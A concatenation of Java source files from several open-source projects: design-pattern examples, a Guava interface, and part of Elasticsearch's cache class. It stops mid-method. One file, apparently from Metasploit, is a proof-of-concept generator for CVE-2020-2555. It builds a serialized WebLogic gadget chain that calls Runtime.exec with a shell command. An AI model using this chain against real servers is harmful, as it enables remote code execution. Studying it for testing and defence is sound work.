* This project is licensed under the MIT license. Module model-view-viewmodel is using ZK framework licensed under LGPL (see lgpl-3.0.txt).
*
* The MIT License
* Copyright © 2014-2022 Ilkka Seppälä
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
*/
package com.iluwatar.page.controller;
import lombok.NoArgsConstructor;
import lombok.extern.slf4j.Slf4j;
import org.springframework.stereotype.Controller;
import org.springframework.ui.Model;
import org.springframework.web.bind.annotation.GetMapping;
/**
* User Controller.
*/
@Slf4j
@Controller
@NoArgsConstructor
public class UserController {
private final UserView view = new UserView();
/**
* Handle http GET request and access view and model.
*/
@GetMapping("/user")
public String getUserPath(SignupModel form, Model model) {
model.addAttribute("name", form.getName());
model.addAttribute("email", form.getEmail());
return view.display(form);
}
} | iluwatar/java-design-patterns | page-controller/src/main/java/com/iluwatar/page/controller/UserController.java |
1,096 | /*
* This project is licensed under the MIT license. Module model-view-viewmodel is using ZK framework licensed under LGPL (see lgpl-3.0.txt).
*
* The MIT License
* Copyright © 2014-2022 Ilkka Seppälä
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
*/
package com.iluwatar.hexagonal.domain;
import static com.iluwatar.hexagonal.domain.LotteryConstants.PRIZE_AMOUNT;
import static com.iluwatar.hexagonal.domain.LotteryConstants.SERVICE_BANK_ACCOUNT;
import com.google.inject.Inject;
import com.iluwatar.hexagonal.banking.WireTransfers;
import com.iluwatar.hexagonal.database.LotteryTicketRepository;
import com.iluwatar.hexagonal.eventlog.LotteryEventLog;
import java.util.Map;
/**
* Lottery administration implementation.
*/
public class LotteryAdministration {
private final LotteryTicketRepository repository;
private final LotteryEventLog notifications;
private final WireTransfers wireTransfers;
/**
* Constructor.
*/
@Inject
public LotteryAdministration(LotteryTicketRepository repository, LotteryEventLog notifications,
WireTransfers wireTransfers) {
this.repository = repository;
this.notifications = notifications;
this.wireTransfers = wireTransfers;
}
/**
* Get all the lottery tickets submitted for lottery.
*/
public Map<LotteryTicketId, LotteryTicket> getAllSubmittedTickets() {
return repository.findAll();
}
/**
* Draw lottery numbers.
*/
public LotteryNumbers performLottery() {
var numbers = LotteryNumbers.createRandom();
var tickets = getAllSubmittedTickets();
for (var id : tickets.keySet()) {
var lotteryTicket = tickets.get(id);
var playerDetails = lotteryTicket.playerDetails();
var playerAccount = playerDetails.bankAccount();
var result = LotteryUtils.checkTicketForPrize(repository, id, numbers).getResult();
if (result == LotteryTicketCheckResult.CheckResult.WIN_PRIZE) {
if (wireTransfers.transferFunds(PRIZE_AMOUNT, SERVICE_BANK_ACCOUNT, playerAccount)) {
notifications.ticketWon(playerDetails, PRIZE_AMOUNT);
} else {
notifications.prizeError(playerDetails, PRIZE_AMOUNT);
}
} else if (result == LotteryTicketCheckResult.CheckResult.NO_PRIZE) {
notifications.ticketDidNotWin(playerDetails);
}
}
return numbers;
}
/**
* Begin new lottery round.
*/
public void resetLottery() {
repository.deleteAll();
}
}
| iluwatar/java-design-patterns | hexagonal/src/main/java/com/iluwatar/hexagonal/domain/LotteryAdministration.java |
1,097 | /*
* This project is licensed under the MIT license. Module model-view-viewmodel is using ZK framework licensed under LGPL (see lgpl-3.0.txt).
*
* The MIT License
* Copyright © 2014-2022 Ilkka Seppälä
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
*/
package com.iluwatar.leaderelection.ring;
import com.iluwatar.leaderelection.AbstractInstance;
import com.iluwatar.leaderelection.Message;
import com.iluwatar.leaderelection.MessageManager;
import java.util.Arrays;
import lombok.extern.slf4j.Slf4j;
/**
* Implementation with token ring algorithm. The instances in the system are organized as a ring.
* Each instance should have a sequential id and the instance with smallest (or largest) id should
* be the initial leader. All the other instances send heartbeat message to leader periodically to
* check its health. If one certain instance finds the server done, it will send an election message
* to the next alive instance in the ring, which contains its own ID. Then the next instance add its
* ID into the message and pass it to the next. After all the alive instances' ID are add to the
* message, the message is send back to the first instance, and it will choose the instance with the
* smallest ID to be the new leader, and then send a leader message to other instances to inform the
* result.
*/
@Slf4j
public class RingInstance extends AbstractInstance {
private static final String INSTANCE = "Instance ";
/**
* Constructor of RingInstance.
*/
public RingInstance(MessageManager messageManager, int localId, int leaderId) {
super(messageManager, localId, leaderId);
}
/**
* Process the heartbeat invoke message. After receiving the message, the instance will send a
* heartbeat to leader to check its health. If alive, it will inform the next instance to do the
* heartbeat. If not, it will start the election process.
*/
@Override
protected void handleHeartbeatInvokeMessage() {
try {
var isLeaderAlive = messageManager.sendHeartbeatMessage(this.leaderId);
if (isLeaderAlive) {
LOGGER.info(INSTANCE + localId + "- Leader is alive. Start next heartbeat in 5 second.");
Thread.sleep(HEARTBEAT_INTERVAL);
messageManager.sendHeartbeatInvokeMessage(this.localId);
} else {
LOGGER.info(INSTANCE + localId + "- Leader is not alive. Start election.");
messageManager.sendElectionMessage(this.localId, String.valueOf(this.localId));
}
} catch (InterruptedException e) {
LOGGER.info(INSTANCE + localId + "- Interrupted.");
}
}
/**
* Process election message. If the local ID is contained in the ID list, the instance will select
* the alive instance with the smallest ID to be the new leader, and send the leader inform message.
* If not, it will add its local ID to the list and send the message to the next instance in the
* ring.
*/
@Override
protected void handleElectionMessage(Message message) {
var content = message.getContent();
LOGGER.info(INSTANCE + localId + " - Election Message: " + content);
var candidateList = Arrays.stream(content.trim().split(","))
.map(Integer::valueOf)
.sorted()
.toList();
if (candidateList.contains(localId)) {
var newLeaderId = candidateList.get(0);
LOGGER.info(INSTANCE + localId + " - New leader should be " + newLeaderId + ".");
messageManager.sendLeaderMessage(localId, newLeaderId);
} else {
content += "," + localId;
messageManager.sendElectionMessage(localId, content);
}
}
/**
* Process leader Message. The instance will set the leader ID to be the new one and send the
* message to the next instance until all the alive instance in the ring is informed.
*/
@Override
protected void handleLeaderMessage(Message message) {
var newLeaderId = Integer.valueOf(message.getContent());
if (this.leaderId != newLeaderId) {
LOGGER.info(INSTANCE + localId + " - Update leaderID");
this.leaderId = newLeaderId;
messageManager.sendLeaderMessage(localId, newLeaderId);
} else {
LOGGER.info(INSTANCE + localId + " - Leader update done. Start heartbeat.");
messageManager.sendHeartbeatInvokeMessage(localId);
}
}
/**
* Not used in Ring instance.
*/
@Override
protected void handleLeaderInvokeMessage() {
// Not used in Ring instance.
}
@Override
protected void handleHeartbeatMessage(Message message) {
// Not used in Ring instance.
}
@Override
protected void handleElectionInvokeMessage() {
// Not used in Ring instance.
}
}
| iluwatar/java-design-patterns | leader-election/src/main/java/com/iluwatar/leaderelection/ring/RingInstance.java |
1,099 | /*
* This project is licensed under the MIT license. Module model-view-viewmodel is using ZK framework licensed under LGPL (see lgpl-3.0.txt).
*
* The MIT License
* Copyright © 2014-2022 Ilkka Seppälä
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
*/
package com.iluwatar.event.asynchronous;
/**
* Events that fulfill the start stop and list out current status behaviour follow this interface.
*/
public interface Event {
void start();
void stop();
void status();
}
| iluwatar/java-design-patterns | event-based-asynchronous/src/main/java/com/iluwatar/event/asynchronous/Event.java |
1,100 | /*
* This project is licensed under the MIT license. Module model-view-viewmodel is using ZK framework licensed under LGPL (see lgpl-3.0.txt).
*
* The MIT License
* Copyright © 2014-2022 Ilkka Seppälä
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
*/
package com.iluwatar.typeobject;
import com.iluwatar.typeobject.Candy.Type;
import java.util.ArrayList;
import java.util.List;
import lombok.extern.slf4j.Slf4j;
/**
* The CandyGame class contains the rules for the continuation of the game and has the game matrix
* (field 'cells') and totalPoints gained during the game.
*/
@Slf4j
@SuppressWarnings("java:S3776") //"Cognitive Complexity of methods should not be too high"
public class CandyGame {
Cell[][] cells;
CellPool pool;
int totalPoints;
CandyGame(int num, CellPool pool) {
this.cells = new Cell[num][num];
this.pool = pool;
this.totalPoints = 0;
for (var i = 0; i < num; i++) {
for (var j = 0; j < num; j++) {
this.cells[i][j] = this.pool.getNewCell();
this.cells[i][j].positionX = j;
this.cells[i][j].positionY = i;
}
}
}
static String numOfSpaces(int num) {
return " ".repeat(Math.max(0, num));
}
void printGameStatus() {
LOGGER.info("");
for (Cell[] cell : cells) {
for (var j = 0; j < cells.length; j++) {
var candyName = cell[j].candy.name;
if (candyName.length() < 20) {
var totalSpaces = 20 - candyName.length();
LOGGER.info(numOfSpaces(totalSpaces / 2) + cell[j].candy.name
+ numOfSpaces(totalSpaces - totalSpaces / 2) + "|");
} else {
LOGGER.info(candyName + "|");
}
}
LOGGER.info("");
}
LOGGER.info("");
}
List<Cell> adjacentCells(int y, int x) {
var adjacent = new ArrayList<Cell>();
if (y == 0) {
adjacent.add(this.cells[1][x]);
}
if (x == 0) {
adjacent.add(this.cells[y][1]);
}
if (y == cells.length - 1) {
adjacent.add(this.cells[cells.length - 2][x]);
}
if (x == cells.length - 1) {
adjacent.add(this.cells[y][cells.length - 2]);
}
if (y > 0 && y < cells.length - 1) {
adjacent.add(this.cells[y - 1][x]);
adjacent.add(this.cells[y + 1][x]);
}
if (x > 0 && x < cells.length - 1) {
adjacent.add(this.cells[y][x - 1]);
adjacent.add(this.cells[y][x + 1]);
}
return adjacent;
}
boolean continueRound() {
for (var i = 0; i < this.cells.length; i++) {
if (this.cells[cells.length - 1][i].candy.getType().equals(Type.REWARD_FRUIT)) {
return true;
}
}
for (var i = 0; i < this.cells.length; i++) {
for (var j = 0; j < this.cells.length; j++) {
if (!this.cells[i][j].candy.getType().equals(Type.REWARD_FRUIT)) {
var adj = adjacentCells(i, j);
for (Cell cell : adj) {
if (this.cells[i][j].candy.name.equals(cell.candy.name)) {
return true;
}
}
}
}
}
return false;
}
void handleChange(int points) {
LOGGER.info("+" + points + " points!");
this.totalPoints += points;
printGameStatus();
}
void round(int timeSoFar, int totalTime) {
var start = System.currentTimeMillis();
var end = System.currentTimeMillis();
while (end - start + timeSoFar < totalTime && continueRound()) {
for (var i = 0; i < this.cells.length; i++) {
var points = 0;
var j = this.cells.length - 1;
while (this.cells[j][i].candy.getType().equals(Type.REWARD_FRUIT)) {
points = this.cells[j][i].candy.getPoints();
this.cells[j][i].crush(pool, this.cells);
handleChange(points);
}
}
for (var i = 0; i < this.cells.length; i++) {
var j = cells.length - 1;
var points = 0;
while (j > 0) {
points = this.cells[j][i].interact(this.cells[j - 1][i], this.pool, this.cells);
if (points != 0) {
handleChange(points);
} else {
j = j - 1;
}
}
}
for (Cell[] cell : this.cells) {
var j = 0;
var points = 0;
while (j < cells.length - 1) {
points = cell[j].interact(cell[j + 1], this.pool, this.cells);
if (points != 0) {
handleChange(points);
} else {
j = j + 1;
}
}
}
end = System.currentTimeMillis();
}
}
} | iluwatar/java-design-patterns | typeobjectpattern/src/main/java/com/iluwatar/typeobject/CandyGame.java |
1,102 | import com.tangosol.util.filter.LimitFilter;
import com.tangosol.util.extractor.ChainedExtractor;
import com.tangosol.util.extractor.ReflectionExtractor;
import javax.management.BadAttributeValueExpException;
import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
/*
* BadAttributeValueExpException.readObject()
* com.tangosol.util.filter.LimitFilter.toString()
* com.tangosol.util.extractor.ChainedExtractor.extract()
* com.tangosol.util.extractor.ReflectionExtractor.extract()
* Method.invoke()
* Runtime.exec()
*
* PoC by Y4er
*/
public class Weblogic_2555
{
public static void main(String args[]) throws Exception
{
ReflectionExtractor extractor = new ReflectionExtractor("getMethod", new Object[]{ "getRuntime", new Class[0] });
ReflectionExtractor extractor2 = new ReflectionExtractor("invoke", new Object[]{ null, new Object[0] });
ReflectionExtractor extractor3 = new ReflectionExtractor("exec", new Object[]{ new String[]{ "/bin/sh", "-c", "touch /tmp/blah_ze_blah" } });
ReflectionExtractor extractors[] = { extractor, extractor2, extractor3 };
ChainedExtractor chainedExt = new ChainedExtractor(extractors);
LimitFilter limitFilter = new LimitFilter();
Field m_comparator = limitFilter.getClass().getDeclaredField("m_comparator");
m_comparator.setAccessible(true);
m_comparator.set(limitFilter, chainedExt);
Field m_oAnchorTop = limitFilter.getClass().getDeclaredField("m_oAnchorTop");
m_oAnchorTop.setAccessible(true);
m_oAnchorTop.set(limitFilter, Runtime.class);
BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException(null);
Field field = badAttributeValueExpException.getClass().getDeclaredField("val");
field.setAccessible(true);
field.set(badAttributeValueExpException, limitFilter);
// Serialize object & save to file
FileOutputStream fos = new FileOutputStream("payload_obj.ser");
ObjectOutputStream os = new ObjectOutputStream(fos);
os.writeObject(badAttributeValueExpException);
os.close();
}
}
| rapid7/metasploit-framework | data/exploits/CVE-2020-2555/Weblogic_2555.java |
1,103 | /*
* Copyright (C) 2011 The Guava Authors
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except
* in compliance with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software distributed under the License
* is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express
* or implied. See the License for the specific language governing permissions and limitations under
* the License.
*/
package com.google.common.cache;
import com.google.common.annotations.GwtCompatible;
/**
* Calculates the weights of cache entries.
*
* @author Charles Fry
* @since 11.0
*/
@GwtCompatible
@ElementTypesAreNonnullByDefault
public interface Weigher<K, V> {
/**
* Returns the weight of a cache entry. There is no unit for entry weights; rather they are simply
* relative to each other.
*
* @return the weight of the entry; must be non-negative
*/
int weigh(K key, V value);
}
| google/guava | android/guava/src/com/google/common/cache/Weigher.java |
1,104 | /*
* Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
* or more contributor license agreements. Licensed under the Elastic License
* 2.0 and the Server Side Public License, v 1; you may not use this file except
* in compliance with, at your election, the Elastic License 2.0 or the Server
* Side Public License, v 1.
*/
package org.elasticsearch.common.cache;
import org.elasticsearch.core.Tuple;
import java.lang.reflect.Array;
import java.util.HashMap;
import java.util.Iterator;
import java.util.Map;
import java.util.Objects;
import java.util.concurrent.CompletableFuture;
import java.util.concurrent.ExecutionException;
import java.util.concurrent.atomic.LongAdder;
import java.util.concurrent.locks.Lock;
import java.util.concurrent.locks.ReadWriteLock;
import java.util.concurrent.locks.ReentrantLock;
import java.util.concurrent.locks.ReentrantReadWriteLock;
import java.util.function.BiConsumer;
import java.util.function.BiFunction;
import java.util.function.Consumer;
import java.util.function.ToLongBiFunction;
/**
* A simple concurrent cache.
* <p>
* Cache is a simple concurrent cache that supports time-based and weight-based evictions, with notifications for all
* evictions. The design goals for this cache were simplicity and read performance. This means that we are willing to
* accept reduced write performance in exchange for easy-to-understand code. Cache statistics for hits, misses and
* evictions are exposed.
* <p>
* The design of the cache is relatively simple. The cache is segmented into 256 segments which are backed by HashMaps.
* Each segment is protected by a re-entrant read/write lock. The read/write locks permit multiple concurrent readers
* without contention, and the segments gives us write throughput without impacting readers (so readers are blocked only
* if they are reading a segment that a writer is writing to).
* <p>
* The LRU functionality is backed by a single doubly-linked list chaining the entries in order of insertion. This
* LRU list is protected by a lock that serializes all writes to it. There are opportunities for improvements
* here if write throughput is a concern.
* <ol>
* <li>LRU list mutations could be inserted into a blocking queue that a single thread is reading from
* and applying to the LRU list.</li>
* <li>Promotions could be deferred for entries that were "recently" promoted.</li>
* <li>Locks on the list could be taken per node being modified instead of globally.</li>
* </ol>
* <p>
* Evictions only occur after a mutation to the cache (meaning an entry promotion, a cache insertion, or a manual
* invalidation) or an explicit call to {@link #refresh()}.
*
* @param <K> The type of the keys
* @param <V> The type of the values
*/
public class Cache<K, V> {
private final LongAdder hits = new LongAdder();
private final LongAdder misses = new LongAdder();
private final LongAdder evictions = new LongAdder();
// positive if entries have an expiration
private long expireAfterAccessNanos = -1;
// true if entries can expire after access
private boolean entriesExpireAfterAccess;
// positive if entries have an expiration after write
private long expireAfterWriteNanos = -1;
// true if entries can expire after initial insertion
private boolean entriesExpireAfterWrite;
// the number of entries in the cache
private int count = 0;
// the weight of the entries in the cache
private long weight = 0;
// the maximum weight that this cache supports
private long maximumWeight = -1;
// the weigher of entries
private ToLongBiFunction<K, V> weigher = (k, v) -> 1;
// the removal callback
private RemovalListener<K, V> removalListener = notification -> {};
// use CacheBuilder to construct
Cache() {}
void setExpireAfterAccessNanos(long expireAfterAccessNanos) {
if (expireAfterAccessNanos <= 0) {
throw new IllegalArgumentException("expireAfterAccessNanos <= 0");
}
this.expireAfterAccessNanos = expireAfterAccessNanos;
this.entriesExpireAfterAccess = true;
}
// public for testing
public long getExpireAfterAccessNanos() {
return this.expireAfterAccessNanos;
}
void setExpireAfterWriteNanos(long expireAfterWriteNanos) {
if (expireAfterWriteNanos <= 0) {
throw new IllegalArgumentException("expireAfterWriteNanos <= 0");
}
this.expireAfterWriteNanos = expireAfterWriteNanos;
this.entriesExpireAfterWrite = true;
}
// pkg-private for testing
long getExpireAfterWriteNanos() {
return this.expireAfterWriteNanos;
}
void setMaximumWeight(long maximumWeight) {
if (maximumWeight < 0) {
throw new IllegalArgumentException("maximumWeight < 0");
}
this.maximumWeight = maximumWeight;
}
void setWeigher(ToLongBiFunction<K, V> weigher) {
Objects.requireNonNull(weigher);
this.weigher = weigher;
}
void setRemovalListener(RemovalListener<K, V> removalListener) {
Objects.requireNonNull(removalListener);
this.removalListener = removalListener;
}
/**
* The relative time used to track time-based evictions.
*
* @return the current relative time
*/
protected long now() {
// System.nanoTime takes non-negligible time, so we only use it if we need it
// use System.nanoTime because we want relative time, not absolute time
return entriesExpireAfterAccess || entriesExpireAfterWrite ? System.nanoTime() : 0;
}
// the state of an entry in the LRU list
enum State {
NEW,
EXISTING,
DELETED
}
private static final class Entry<K, V> {
final K key;
final V value;
final long writeTime;
volatile long accessTime;
Entry<K, V> before;
Entry<K, V> after;
State state = State.NEW;
Entry(K key, V value, long writeTime) {
this.key = key;
this.value = value;
this.writeTime = this.accessTime = writeTime;
}
}
/**
* A cache segment.
* <p>
* A CacheSegment is backed by a HashMap and is protected by a read/write lock.
*/
private final class CacheSegment {
// read/write lock protecting mutations to the segment
final ReadWriteLock segmentLock = new ReentrantReadWriteLock();
final Lock readLock = segmentLock.readLock();
final Lock writeLock = segmentLock.writeLock();
Map<K, CompletableFuture<Entry<K, V>>> map;
/**
* get an entry from the segment; expired entries will be returned as null but not removed from the cache until the LRU list is
* pruned or a manual {@link Cache#refresh()} is performed however a caller can take action using the provided callback
*
* @param key the key of the entry to get from the cache
* @param now the access time of this entry
* @param eagerEvict whether entries should be eagerly evicted on expiration
* @return the entry if there was one, otherwise null
*/
Entry<K, V> get(K key, long now, boolean eagerEvict) {
CompletableFuture<Entry<K, V>> future;
readLock.lock();
try {
future = map == null ? null : map.get(key);
} finally {
readLock.unlock();
}
if (future != null) {
Entry<K, V> entry;
try {
entry = future.get();
} catch (ExecutionException e) {
assert future.isCompletedExceptionally();
misses.increment();
return null;
} catch (InterruptedException e) {
throw new IllegalStateException(e);
}
if (isExpired(entry, now)) {
misses.increment();
if (eagerEvict) {
lruLock.lock();
try {
evictEntry(entry);
} finally {
lruLock.unlock();
}
}
return null;
} else {
hits.increment();
entry.accessTime = now;
return entry;
}
} else {
misses.increment();
return null;
}
}
/**
* put an entry into the segment
*
* @param key the key of the entry to add to the cache
* @param value the value of the entry to add to the cache
* @param now the access time of this entry
* @return a tuple of the new entry and the existing entry, if there was one otherwise null
*/
Tuple<Entry<K, V>, Entry<K, V>> put(K key, V value, long now) {
Entry<K, V> entry = new Entry<>(key, value, now);
Entry<K, V> existing = null;
writeLock.lock();
try {
try {
if (map == null) {
map = new HashMap<>();
}
CompletableFuture<Entry<K, V>> future = map.put(key, CompletableFuture.completedFuture(entry));
if (future != null) {
existing = future.handle((ok, ex) -> ok).get();
}
} catch (ExecutionException | InterruptedException e) {
throw new IllegalStateException(e);
}
} finally {
writeLock.unlock();
}
return Tuple.tuple(entry, existing);
}
/**
* remove an entry from the segment
*
* @param key the key of the entry to remove from the cache
*/
void remove(K key) {
CompletableFuture<Entry<K, V>> future;
writeLock.lock();
try {
if (map == null) {
future = null;
} else {
future = map.remove(key);
if (map.isEmpty()) {
map = null;
}
}
} finally {
writeLock.unlock();
}
if (future != null) {
evictions.increment();
notifyWithInvalidated(future);
}
}
/**
* remove an entry from the segment iff the future is done and the value is equal to the
* expected value
*
* @param key the key of the entry to remove from the cache
* @param value the value expected to be associated with the key
* @param notify whether to trigger a removal notification if the entry has been removed
*/
void remove(K key, V value, boolean notify) {
CompletableFuture<Entry<K, V>> future;
boolean removed = false;
writeLock.lock();
try {
future = map == null ? null : map.get(key);
try {
if (future != null) {
if (future.isDone()) {
Entry<K, V> entry = future.get();
if (Objects.equals(value, entry.value)) {
removed = map.remove(key, future);
if (map.isEmpty()) {
map = null;
}
}
}
}
} catch (ExecutionException | InterruptedException e) {
throw new IllegalStateException(e);
}
} finally {
writeLock.unlock();
}
if (future != null && removed) {
evictions.increment();
if (notify) {
notifyWithInvalidated(future);
}
}
}
}
public static final int NUMBER_OF_SEGMENTS = 256;
@SuppressWarnings("unchecked")
private final CacheSegment[] segments = (CacheSegment[]) Array.newInstance(CacheSegment.class, NUMBER_OF_SEGMENTS);
{
for (int i = 0; i < segments.length; i++) {
segments[i] = new CacheSegment();
}
}
Entry<K, V> head;
Entry<K, V> tail;
// lock protecting mutations to the LRU list
private final ReentrantLock lruLock = new ReentrantLock();
/**
* Returns the value to which the specified key is mapped, or null if this map contains no mapping for the key.
*
* @param key the key whose associated value is to be returned
* @return the value to which the specified key is mapped, or null if this map contains no mapping for the key
*/
public V get(K key) {
return get(key, now(), false);
}
private V get(K key, long now, boolean eagerEvict) {
CacheSegment segment = getCacheSegment(key);
Entry<K, V> entry = segment.get(key, now, eagerEvict);
if (entry == null) {
return null;
} else {
promote(entry, now);
return entry.value;
}
}
/**
* If the specified key is not already associated with a value (or is mapped to null), attempts to compute its
* value using the given mapping function and enters it into this map unless null. The load method for a given key
* will be invoked at most once.
*
* Use of different {@link CacheLoader} implementations on the same key concurrently may result in only the first
* loader function being called and the second will be returned the result provided by the first including any exceptions
* thrown during the execution of the first.
*
* @param key the key whose associated value is to be returned or computed for if non-existent
* @param loader the function to compute a value given a key
* @return the current (existing or computed) non-null value associated with the specified key
* @throws ExecutionException thrown if loader throws an exception or returns a null value
*/
public V computeIfAbsent(K key, CacheLoader<K, V> loader) throws ExecutionException {
long now = now();
// we have to eagerly evict expired entries or our putIfAbsent call below will fail
V value = get(key, now, true);
if (value == null) {
// we need to synchronize loading of a value for a given key; however, holding the segment lock while
// invoking load can lead to deadlock against another thread due to dependent key loading; therefore, we
// need a mechanism to ensure that load is invoked at most once, but we are not invoking load while holding
// the segment lock; to do this, we atomically put a future in the map that can load the value, and then
// get the value from this future on the thread that won the race to place the future into the segment map
final CacheSegment segment = getCacheSegment(key);
CompletableFuture<Entry<K, V>> future;
CompletableFuture<Entry<K, V>> completableFuture = new CompletableFuture<>();
segment.writeLock.lock();
try {
if (segment.map == null) {
segment.map = new HashMap<>();
}
future = segment.map.putIfAbsent(key, completableFuture);
} finally {
segment.writeLock.unlock();
}
BiFunction<? super Entry<K, V>, Throwable, ? extends V> handler = (ok, ex) -> {
if (ok != null) {
promote(ok, now);
return ok.value;
} else {
segment.writeLock.lock();
try {
CompletableFuture<Entry<K, V>> sanity = segment.map == null ? null : segment.map.get(key);
if (sanity != null && sanity.isCompletedExceptionally()) {
segment.map.remove(key);
if (segment.map.isEmpty()) {
segment.map = null;
}
}
} finally {
segment.writeLock.unlock();
}
return null;
}
};
CompletableFuture<V> completableValue;
if (future == null) {
future = completableFuture;
completableValue = future.handle(handler);
V loaded;
try {
loaded = loader.load(key);
} catch (Exception e) {
future.completeExceptionally(e);
throw new ExecutionException(e);
}
if (loaded == null) {
NullPointerException npe = new NullPointerException("loader returned a null value");
future.completeExceptionally(npe);
throw new ExecutionException(npe);
} else {
future.complete(new Entry<>(key, loaded, now));
}
} else {
completableValue = future.handle(handler);
}
try {
value = completableValue.get();
// check to ensure the future hasn't been completed with an exception
if (future.isCompletedExceptionally()) {
future.get(); // call get to force the exception to be thrown for other concurrent callers
throw new IllegalStateException("the future was completed exceptionally but no exception was thrown");
}
} catch (InterruptedException e) {
throw new IllegalStateException(e);
}
}
return value;
}
/**
* Associates the specified value with the specified key in this map. If the map previously contained a mapping for
* the key, the old value is replaced.
*
* @param key key with which the specified value is to be associated
* @param value value to be associated with the specified key
*/
public void put(K key, V value) {
long now = now();
put(key, value, now);
}
private void put(K key, V value, long now) {
CacheSegment segment = getCacheSegment(key);
Tuple<Entry<K, V>, Entry<K, V>> tuple = segment.put(key, value, now);
boolean replaced = false;
lruLock.lock();
try {
if (tuple.v2() != null && tuple.v2().state == State.EXISTING) {
if (unlink(tuple.v2())) {
replaced = true;
}
}
promote(tuple.v1(), now);
} finally {
lruLock.unlock();
}
if (replaced) {
removalListener.onRemoval(
new RemovalNotification<>(tuple.v2().key, tuple.v2().value, RemovalNotification.RemovalReason.REPLACED)
);
}
}
private void notifyWithInvalidated(CompletableFuture<Entry<K, V>> f) {
try {
